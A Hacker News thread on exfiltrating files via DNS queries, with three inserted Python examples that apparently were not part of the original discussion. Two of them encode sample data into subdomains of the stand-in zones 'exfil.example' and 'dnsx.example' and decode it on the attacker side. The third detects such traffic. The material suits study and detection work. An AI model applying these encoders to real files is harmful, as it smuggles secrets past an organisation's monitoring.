
Exfiltrate Files with DNS Queries - 16s
http://16s.us/dns
======
X-Istence
Dan Kaminsky a couple of years ago did a talk about this, as well as using DNS
to cache files...

[http://byteworm.com/2010/10/27/free-content-delivery-network...](http://byteworm.com/2010/10/27/free-content-delivery-network-using-dns-cache/)

Exfiltrating using DNS, or VPN over DNS and the various other techniques are
not new.

They do show how difficult it is to police data from leaving one's network.

~~~
16s
This is an actual working example, not theory on how to do it. IMO, that's
what makes it significant. Lots of people talk about how this can be done,
few show actual working examples (with source code) that others can re-create
on their networks.

~~~
cypherpunks01
Sorry to rain on your parade, but Dan Kaminsky additionally wrote an
implementation called ozymandns in 2005 or so:

[http://dnstunnel.de/](http://dnstunnel.de/)

I use it when I need an ssh or web connection in extremely hostile
environments that only allow free DNS queries out, like some planes, buses,
establishments, etc.

There are also links to other implementations here:
[http://en.cship.org/wiki/OzymanDNS](http://en.cship.org/wiki/OzymanDNS)

~~~
16s
Those examples tunnel traffic over DNS. They do not specifically break large
files up into small chunks and exfiltrate them off of a secure network with
simple DNS queries.

~~~
cypherpunks01
Sure, yes. All those examples (ozyman, iodine, etc.) tunnel arbitrary traffic
over DNS, whereas yours is more traffic-efficient in essentially being a
static file server via DNS, I suppose?

------
dgl
This seems to use base64; DNS is case-insensitive, so really it should use
base32 or some other encoding scheme. However, DNS is usually case-preserving,
so it will likely work.

Unless the recursive nameserver in use happens to implement this hack for
improved security: [http://tools.ietf.org/html/draft-vixie-dnsext-dns0x20-00](http://tools.ietf.org/html/draft-vixie-dnsext-dns0x20-00)

~~~
dfc
Supported in Unbound with `use-caps-for-id`
[http://www.unbound.net/documentation/unbound.conf.html](http://www.unbound.net/documentation/unbound.conf.html)

I love unbound.
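The case-folding problem dgl and dfc are discussing, as an added example that is not code from the original post or from 16s's tool. It chunks a constructed sample file into DNS labels two ways (base64 and base32), pushes the resulting query names through a simulated resolver that randomises letter case the way draft-vixie-dnsext-dns0x20 (Unbound's `use-caps-for-id`) does, and reassembles on the "authoritative" side. The chunk size, the zone name `exfil.example` and the `<sequence>.<label>.<zone>` layout are assumptions for illustration.

```python
import base64
import random

# Constructed sample payload; not from the original post.
SAMPLE = b"secret plans: move the launch to 0400 on tuesday\n"
CHUNK = 8                    # bytes per query (assumed; small chunks keep labels short)
DOMAIN = "exfil.example"     # assumed attacker-controlled zone


def chunks(data, size=CHUNK):
    """Yield fixed-size pieces of the file; the last one may be shorter."""
    for i in range(0, len(data), size):
        yield data[i:i + size]


def label_b64(chunk):
    """Base64 label: compact, but its alphabet depends on letter case."""
    return base64.urlsafe_b64encode(chunk).decode().rstrip("=")


def label_b32(chunk):
    """Base32 label (RFC 4648): A-Z and 2-7 only, so case carries no information."""
    return base64.b32encode(chunk).decode().rstrip("=").lower()


def qnames(data, encoder, domain=DOMAIN):
    """One query name per chunk: <sequence>.<encoded chunk>.<zone>."""
    names = []
    for seq, piece in enumerate(chunks(data)):
        label = encoder(piece)
        assert len(label) <= 63, "a DNS label is at most 63 octets"
        names.append(f"{seq}.{label}.{domain}")
    return names


def dns0x20(qname, rng):
    """Model a resolver implementing draft-vixie-dnsext-dns0x20 (Unbound's
    use-caps-for-id): the case of every letter is randomised before the query
    is forwarded, and that spelling is what the authoritative server sees."""
    return "".join(c.swapcase() if c.isalpha() and rng.random() < 0.5 else c
                   for c in qname)


def decode_b64(label):
    # Valid characters, wrong case: decodes without error to the wrong bytes.
    return base64.urlsafe_b64decode(label + "=" * (-len(label) % 4))


def decode_b32(label):
    # Fold to one case first: base32 survives whatever the resolver did.
    return base64.b32decode(label.upper() + "=" * (-len(label) % 8))


def reassemble(received, decoder):
    """Authoritative side: order by sequence number and decode each label."""
    parts = []
    for name in received:
        seq, label, _zone = name.split(".", 2)
        parts.append((int(seq), decoder(label)))
    return b"".join(piece for _, piece in sorted(parts))


def roundtrip(data, encoder, decoder, casefold, seed=1):
    """Send data through a (simulated) resolver; casefold=True models 0x20."""
    rng = random.Random(seed)
    sent = qnames(data, encoder)
    seen = [dns0x20(n, rng) if casefold else n for n in sent]
    return reassemble(seen, decoder)


if __name__ == "__main__":
    for name, enc, dec in (("base64", label_b64, decode_b64),
                           ("base32", label_b32, decode_b32)):
        ok = roundtrip(SAMPLE, enc, dec, casefold=True) == SAMPLE
        print(f"{name}: {'survives' if ok else 'corrupted by'} 0x20 case randomisation")
```

The base64 path does not fail loudly: every case-flipped character is still in the alphabet, so the decoder returns garbage rather than an error, which is exactly why an exfiltration tool that relies on case would "likely work" on most resolvers and silently break behind a 0x20-enabled one.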

------
bryogenic
Don't just get files, use DNS for Command and Control too.

[http://blog.strategiccyber.com/2013/06/06/dns-command-and-co...](http://blog.strategiccyber.com/2013/06/06/dns-command-and-control-added-to-cobalt-strike/)

~~~
raffi
After I wrote that blog post, I also added the ability to tunnel traffic
through Beacon when it's checking in several times each second. Recently, I
added the ability for it to download a large file, a piece at a time, with
each checkin. The size of the piece depends on the data channel (DNS vs.
HTTP). It's all encrypted too.

- [http://blog.strategiccyber.com/2013/06/20/thatll-never-work-...](http://blog.strategiccyber.com/2013/06/20/thatll-never-work-we-dont-allow-port-53-out/)

- [http://blog.strategiccyber.com/2013/07/09/hacking-through-a-...](http://blog.strategiccyber.com/2013/07/09/hacking-through-a-straw-pivoting-over-dns/)

Cobalt Strike is a commercial tool, so it better include the bells and
whistles. The OP does a good job of showing code that anyone can play with,
right now.

Dan Kaminsky's BlackHat presentations on OzymanDNS are excellent as well.

~~~
16s
I really like your blog post and your ideas.

With new versions of BIND 10 allowing Python scripting, PowerDNS with Lua
scripting and Unbound with Python, I think we'll start seeing more corps
controlling DNS queries (or attempting to do so) with whitelists/blacklists,
but for the time being, things are mostly wide-open.

------
agnokapathetic
The author of sqlmap added DNS exfiltration for blind SQL injection last year.
Really creative technique (DNS stack doubled the size of sqlmap code-base).

Paper:
[http://arxiv.org/pdf/1303.3047.pdf](http://arxiv.org/pdf/1303.3047.pdf)

Slides: [http://www.slideshare.net/stamparm/dns-exfiltration-using-sq...](http://www.slideshare.net/stamparm/dns-exfiltration-using-sqlmap-13163281)
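The receiving side of the technique agnokapathetic describes, as an added example that is not sqlmap's code or the paper's: the injected query makes the database server resolve a name whose leading labels carry the hex-encoded value, and whoever runs the authoritative nameserver for that zone only has to parse the incoming question and decode it. The block builds a query packet for a constructed sample value, parses it back from DNS wire format, and recovers the value; the zone `dnsx.example`, the hex-in-labels layout and the sample value are assumptions, and the 62-character label split is there because a label is limited to 63 octets and an odd-length hex label would break byte boundaries.

```python
import struct

ZONE = "dnsx.example"   # assumed attacker-controlled zone whose nameserver logs queries
MAX_LABEL = 63          # RFC 1035 label limit; 62 hex chars keep byte boundaries intact

# Constructed sample value the injected query "leaks"; not real data.
SECRET = b"admin:5f4dcc3b5aa765d61d8327deb882cf99"


def exfil_name(value, zone=ZONE):
    """Hex-encode value and split it into labels of at most 62 characters."""
    hexstr = value.hex()
    labels = [hexstr[i:i + 62] for i in range(0, len(hexstr), 62)]
    return ".".join(labels + [zone])


def encode_name(name):
    """DNS wire-format name: length-prefixed labels, terminated by a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= MAX_LABEL:
            raise ValueError(f"bad label length {len(raw)}")
        out += bytes([len(raw)]) + raw
    out += b"\x00"
    if len(out) > 255:
        raise ValueError("name exceeds 255 octets on the wire")
    return out


def build_query(name, txid=0x1234, rd=True, qtype=1):
    """Standard query (QR=0, opcode 0); qtype 1 = A, class 1 = IN."""
    flags = 0x0100 if rd else 0x0000          # RD is bit 8 of the flags word
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_question(pkt):
    """Parse the header and the single question of a query packet."""
    txid, flags, qdcount, _an, _ns, _ar = struct.unpack("!HHHHHH", pkt[:12])
    if flags & 0x8000:
        raise ValueError("not a query (QR bit set)")
    if qdcount != 1:
        raise ValueError("expected exactly one question")
    pos, labels = 12, []
    while True:
        length = pkt[pos]
        pos += 1
        if length == 0:
            break
        if length & 0xC0:
            raise ValueError("compression pointers are not valid in a question name")
        labels.append(pkt[pos:pos + length].decode("ascii"))
        pos += length
    qtype, qclass = struct.unpack("!HH", pkt[pos:pos + 4])
    return {"txid": txid, "rd": bool(flags & 0x0100),
            "labels": labels, "qtype": qtype, "qclass": qclass}


def leaked_value(labels, zone=ZONE):
    """Return the decoded value if the name is under our zone, else None."""
    zone_labels = zone.split(".")
    if [l.lower() for l in labels[-len(zone_labels):]] != zone_labels:
        return None
    data = "".join(labels[:-len(zone_labels)])
    if not data:
        return None
    try:
        return bytes.fromhex(data)   # hex is case-insensitive, so 0x20 does no harm
    except ValueError:
        return None                  # ordinary traffic under the zone, not a payload


if __name__ == "__main__":
    pkt = build_query(exfil_name(SECRET))
    q = parse_question(pkt)
    print("qname :", ".".join(q["labels"]))
    print("leaked:", leaked_value(q["labels"]))
```

Hex costs two characters per byte, which is why sqlmap-style exfiltration of a long column takes many queries; the upside is that the encoding is immune to resolvers that randomise case, unlike base64.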

------
gwu78
8 bytes at a time.

Wouldn't that mean 100's, 1000's or 10's of thousands of requests for
nonsensical subdomains of the same domain name (and that domain name is
probably a silly one if you got it recently for 10 bucks).

This is not anomalous DNS traffic? My imagination just does not stretch this
far. If the title was just "Transfer a file via DNS", maybe I could play
along.

I think nstx preceded iodine.

Here's another one no one has mentioned yet:

[http://www.skullsecurity.org/wiki/index.php/Dnscat](http://www.skullsecurity.org/wiki/index.php/Dnscat)

What I'd really like to see is an implementation of lcamtuf's old, pre-
cloud/dropbox idea: daemon caches, specifically recursive DNS caches, as free,
(temporary) distributed storage. Anyone can store data for free on 100's of
1000's of networked computers worldwide, otherwise known as recursive DNS
caches. Currently we only store "domain names" on these servers, but as the OP
shows, it's possible to encode more information into requests than just domain
names.

Imagine if the encoded data was an image. With most recursive DNS servers, the
data expires upon the TTL expiry. Snapchat via DNS.

------
ryan-c
This is a hack of mine that stores files in public DNS caches. It's a
horrible, slow hack, but it does work.

[https://github.com/ryancdotorg/dnsstore](https://github.com/ryancdotorg/dnsstore)

~~~
gwu78
Some caches, like dnscache (and thus OpenDNS), may not respond to non-
recursive queries. Would this break your dns_peek function?

~~~
ryan-c
Correct, it requires the cache to respond to queries with the recursion bit
disabled.

It will also probably behave in "interesting" ways when run against a resolver
that's on an anycast IP and doesn't synchronize.

------
malandrew

        "When/if the network security team figures this out and 
        blocks it, I'll demonstrate a few other ways in which data 
        can be exfiltrated."
    

I loved this line.

He mentions blocking there, but given the technique, could forensics show that
this has been used? For example, could some future whistleblower for a
national security agency (ours or anyone else's for that matter) use this to
exfiltrate files without risk of discovery after the fact?

Could an organization like wikileaks or the guardian use this as a technique
for whistleblowers to leak files safely?

~~~
16s
In a well-monitored environment, it should draw attention and cause them to
investigate the internal host making the queries.
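What "draw attention in a well-monitored environment" can look like in practice, as an added example that is not from the original post: the traffic gwu78 describes (hundreds or thousands of nonsensical subdomains of one cheap domain, all from one internal host) is detectable with two cheap heuristics over the resolver's query log, the number of distinct names a client asks for under one registered domain and the character entropy of the leading labels. The log format, the `exfil.example` zone, the thresholds and the "last two labels" approximation of a registered domain are assumptions; a real deployment would use the Public Suffix List and a sliding time window.

```python
import math
from collections import defaultdict

# Constructed resolver log, not real traffic: "<time> <client> <qname> <qtype>".
LOG = """\
12:00:01 10.0.0.5 www.example.org A
12:00:01 10.0.0.5 0.onswy3dcofxgy.exfil.example A
12:00:01 10.0.0.5 1.mfrgc6lnkz2e4.exfil.example A
12:00:01 10.0.0.5 2.krzws5a7jqbdt.exfil.example A
12:00:01 10.0.0.5 3.pu3hxyvt2ifsa.exfil.example A
12:00:02 10.0.0.5 4.gazdc4l6mnkbe.exfil.example A
12:00:02 10.0.0.5 5.hvw3qt7rpo5ye.exfil.example A
12:00:02 10.0.0.5 6.cixg2btfl4jmq.exfil.example A
12:00:02 10.0.0.5 7.ne6dkwa3zsqpu.exfil.example A
12:00:02 10.0.0.5 8.b2vfyr7lgtoix.exfil.example A
12:00:03 10.0.0.5 9.tz5hcemxa4sjk.exfil.example A
12:00:03 10.0.0.5 10.q7ndgpw2fub6y.exfil.example A
12:00:03 10.0.0.5 11.lsk3mxwp5yaet.exfil.example A
12:00:03 10.0.0.5 www.example.org A
12:00:03 10.0.0.7 mail.example.org MX
12:00:04 10.0.0.7 d1a2b3c4e5f6g7.cloudfront.net A
12:00:04 10.0.0.7 time.nist.gov A
"""


def registered_domain(qname):
    """Crude eTLD+1 (last two labels); real deployments use the Public Suffix List.
    Returns (registered domain, list of leading labels)."""
    labels = qname.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]), labels[:-2]


def entropy(text):
    """Shannon entropy in bits per character; encoded data scores high."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyse(lines, min_unique=10, min_entropy=3.0):
    """Group queries by (client, registered domain) and flag groups where the
    client asked for many distinct names whose leading labels look like data.
    Both conditions are required: a CDN host name is high-entropy but rarely
    unique, and a busy web site has many names but low-entropy labels."""
    stats = defaultdict(lambda: {"names": set(), "label_bytes": 0, "entropies": []})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, qname, _qtype = line.split()
        domain, sub = registered_domain(qname)
        if not sub:                      # bare domain, no leading labels to carry data
            continue
        s = stats[(client, domain)]
        s["names"].add(qname.lower())
        s["label_bytes"] += sum(len(l) for l in sub)
        s["entropies"].append(entropy("".join(sub)))

    alerts = []
    for (client, domain), s in stats.items():
        unique = len(s["names"])
        mean_ent = sum(s["entropies"]) / len(s["entropies"])
        if unique >= min_unique and mean_ent >= min_entropy:
            alerts.append({"client": client, "domain": domain,
                           "unique_names": unique,
                           "label_bytes": s["label_bytes"],
                           "mean_entropy": round(mean_ent, 2)})
    return sorted(alerts, key=lambda a: -a["unique_names"])


if __name__ == "__main__":
    for alert in analyse(LOG.splitlines()):
        print(alert)
```

`label_bytes` is the volume indicator: for a tool that sends 8 bytes per query, the number of bytes that left the network is roughly proportional to it, which is the figure an incident responder will be asked for once the host is identified.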

------
contingencies
People have been doing covert channels over DNS in the wild since <2001. Fast
forward 12 years, and this is the new 'my first socket app'.

------
sg2342
There was a related talk [1] at USENIX 2013 in which this (quite old, I
might add) method of information exfiltration was analyzed.

Bottom line: amateurs get caught.

[1]
[https://www.usenix.org/conference/usenixsecurity13/practical...](https://www.usenix.org/conference/usenixsecurity13/practical-comprehensive-bounds-surreptitious-communication-over-dns)

------
malandrew
Could gifsockets be used to exfiltrate a file as well?

[https://github.com/videlalvaro/gifsockets](https://github.com/videlalvaro/gifsockets)

